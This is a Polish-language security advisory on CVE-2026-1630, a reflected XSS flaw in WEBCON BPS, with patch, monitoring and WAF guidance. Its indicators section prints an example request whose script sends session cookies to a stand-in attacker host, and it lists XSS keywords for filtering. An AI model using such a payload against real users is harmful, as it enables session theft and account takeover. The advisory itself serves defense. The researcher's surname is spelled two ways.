WEBCON BPS : XSS w popularnym polskim systemie

TL;DR: W systemie WEBCON BPS zidentyfikowano podatność, która może narazić polskie firmy i instytucje na ataki. Zalecamy administratorom pilne wdrożenie poprawek.

W skrócie:

• Co się stało: Wykryto podatność typu Reflected Cross-Site Scripting (XSS) w oprogramowaniu WEBCON BPS ^{1 2}.
• Identyfikator: CVE-2026-1630.
• Zagrożenie: Atakujący może wykonać dowolny kod JavaScript w przeglądarce zalogowanego użytkownika, co może prowadzić do kradzieży sesji, phishingu lub modyfikacji danych ³.
• Wektor: Spreparowany link wysłany do ofiary, np. w wiadomości e-mail ⁴.
• Dotyczy: Użytkowników WEBCON BPS w wersjach od 2026.1.1.45 poniżej 2026.1.3.109 oraz od 2025.1.1.87 poniżej 2025.2.1.293.
• Co robić: Pilnie zaktualizować system do wersji 2026.1.3.109 lub 2025.2.1.293 ⁵.

Wektor ataku

Opublikowano informacje o nowej podatności w oprogramowaniu WEBCON BPS ¹, popularnym polskim systemie klasy Business Process Suite, używanym do automatyzacji i cyfryzacji obiegu dokumentów w wielu organizacjach, w tym w sektorze publicznym i dużych przedsiębiorstwach. Podatności nadano identyfikator CVE (Common Vulnerabilities and Exposures — identyfikator publicznie znanej luki) CVE-2026-1630.

Luka została sklasyfikowana jako Reflected Cross-site Scripting (XSS) ². Jest to klasa ataku, w której złośliwy skrypt jest wstrzykiwany do zaufanej strony internetowej. W wariancie „Reflected” ładunek jest częścią adresu URL i „odbija się” od serwera, by następnie zostać wykonanym w przeglądarce ofiary. Nie jest on trwale zapisywany w bazie danych aplikacji.

Analiza techniczna wskazuje, że podatny jest punkt końcowy (endpoint) /openinmobileapp ⁶. Atakujący może przygotować specjalny adres URL, który w jednym z parametrów zawiera złośliwy kod JavaScript ³. Jeśli uwierzytelniony użytkownik systemu WEBCON BPS kliknie w taki link, na przykład otrzymany w wiadomości phishingowej, wspomniany kod zostanie wykonany w kontekście jego aktywnej sesji w przeglądarce ⁴.

Skutki takiego ataku mogą być poważne. Wykonanie kodu w przeglądarce może pozwolić na kradzież ciasteczek sesyjnych, co może umożliwić operatorowi ataku przejęcie konta użytkownika bez znajomości hasła. Inne możliwe scenariusze to przekierowanie ofiary na fałszywą stronę logowania w celu wyłudzenia poświadczeń lub dynamiczna modyfikacja zawartości strony, aby skłonić użytkownika do podjęcia nieautoryzowanych działań. Biorąc pod uwagę, że systemy takie jak WEBCON BPS często przetwarzają wrażliwe dane biznesowe i osobowe, ryzyko jest znaczące.

Wskaźniki kompromitacji

Na ten moment nie opublikowano konkretnych wskaźników kompromitacji (IoC — Indicators of Compromise), takich jak domeny czy adresy IP używane w aktywnych atakach. Administratorzy powinni jednak proaktywnie monitorować logi serwerów WWW pod kątem prób wykorzystania luki.

Należy szukać nietypowych żądań kierowanych do endpointu /openinmobileapp, które w parametrach zapytania zawierają ciągi znaków charakterystyczne dla ataków XSS. Poniżej przedstawiamy poglądowy przykład, jak może wyglądać złośliwy URL (to nie jest realny wskaźnik ataku).

# Przykład poglądowy - nie jest to realny IoC
# Należy szukać w logach żądań GET do /openinmobileapp z podejrzanymi parametrami

GET /openinmobileapp?returnUrl=<script>document.location='http://atakujacy.xyz/log.php?c='+document.cookie</script> HTTP/1.1
Host: instancja-klienta.webcon.pl

Co zrobić w 24-48h

Rekomendujemy podjęcie natychmiastowych działań w celu mitygacji zagrożenia. Poniższe kroki powinny być potraktowane priorytetowo przez administratorów systemów i zespoły bezpieczeństwa.

1. Pilna aktualizacja (krytyczne): Producent oprogramowania, firma WEBCON, opublikował już stosowne poprawki. Rekomendowanym i najskuteczniejszym działaniem jest natychmiastowa aktualizacja systemu do jednej z zabezpieczonych wersji: 2026.1.3.109 lub 2025.2.1.293 ^{5 7}.

2. Weryfikacja wersji: Należy upewnić się, czy używana w organizacji wersja WEBCON BPS znajduje się w zakresie podatnych wersji. Zgodnie z opublikowanymi informacjami, problem dotyczy wersji od 2026.1.1.45 do 2026.1.3.109 oraz od 2025.1.1.87 do 2025.2.1.293.

3. Monitoring i filtrowanie (jeśli aktualizacja jest niemożliwa): W sytuacji, gdy natychmiastowa aktualizacja nie jest możliwa z przyczyn operacyjnych, zalecanym podejściem jest wdrożenie tymczasowych mechanizmów mitygujących. Może to obejmować wdrożenie reguł na poziomie Web Application Firewall (WAF) w celu blokowania żądań do endpointu /openinmobileapp, które zawierają typowe dla XSS ciągi znaków (np. <script>, onerror, onload). Należy jednak pamiętać, że jest to rozwiązanie tymczasowe i nie zastępuje pełnej aktualizacji.

4. Komunikacja wewnętrzna: Niezależnie od podjętych kroków technicznych, warto poinformować użytkowników systemu, zwłaszcza tych z podwyższonymi uprawnieniami, o zagrożeniu. Należy uczulić pracowników na próby phishingu i podkreślić, aby nie klikać w podejrzane linki prowadzące do systemu WEBCON BPS, które mogłyby zostać przesłane w wiadomościach e-mail lub za pośrednictwem komunikatorów.

Atrybucja

Proces odpowiedzialnego ujawniania podatności (ang. coordinated disclosure) był koordynowany przez zespół CERT Polska ⁸, który odegrał kluczową rolę w komunikacji między badaczem a producentem oprogramowania. Informacja o luce została upubliczniona 14 maja 2026 roku ⁹.

Za zgłoszenie podatności publicznie podziękowano badaczowi bezpieczeństwa, Konradowi Szczepanikowi ¹⁰.

Źródła

Zobacz też

• Alert: Luka XSS w Verint Verba zagraża danym administratorów
• Krytyczne luki w DHTMLX: RCE i odczyt plików
• LEX Baza Dokumentów: XSS w ciasteczku zagrażał użytkownikom
• Trzy krytyczne luki w Hydrosystem Control System

Footnotes

1. Podatność CVE-2026-1630 została wykryta w oprogramowaniu WEBCON BPS. — https://cert.pl/posts/2026/05/CVE-2026-1630/ ↩ ↩²

2. Podatność CVE-2026-1630 to Reflected XSS (Cross-site Scripting). — https://cert.pl/posts/2026/05/CVE-2026-1630/ ↩ ↩²

3. Atakujący może wysłać specjalnie spreparowany adres URL, którego otwarcie przez uwierzytelnionego użytkownika skutkuje wykonaniem dowolnego kodu JavaScript w przeglądarce ofiary. — https://cert.pl/posts/2026/05/CVE-2026-1630/ ↩ ↩²

4. Atakujący może wysłać specjalnie spreparowany URL, który po otwarciu przez uwierzytelnionego użytkownika, prowadzi do wykonania dowolnego kodu JavaScript w przeglądarce ofiary. — https://nvd.nist.gov/vuln/detail/CVE-2026-1630 ↩ ↩²

5. Podatność została naprawiona w wersjach 2026.1.3.109 oraz 2025.2.1.293. — https://cert.pl/posts/2026/05/CVE-2026-1630/ ↩ ↩²

6. WEBCON BPS jest podatny na Reflected XSS poprzez jeden z parametrów używanych przez endpoint /openinmobileapp. — https://nvd.nist.gov/vuln/detail/CVE-2026-1630 ↩

7. Problem został naprawiony w wersjach 2026.1.3.109 i 2025.2.1.293. — https://nvd.nist.gov/vuln/detail/CVE-2026-1630 ↩

8. CERT Polska otrzymał zgłoszenie o podatności i koordynował proces ujawniania informacji. — https://cert.pl/posts/2026/05/CVE-2026-1630/ ↩

9. Data publikacji informacji o podatności to 14 maja 2026. — https://cert.pl/posts/2026/05/CVE-2026-1630/ ↩

10. Za zgłoszenie podatności podziękowano Konradowi Szczepaniakowi. — https://cert.pl/posts/2026/05/CVE-2026-1630/ ↩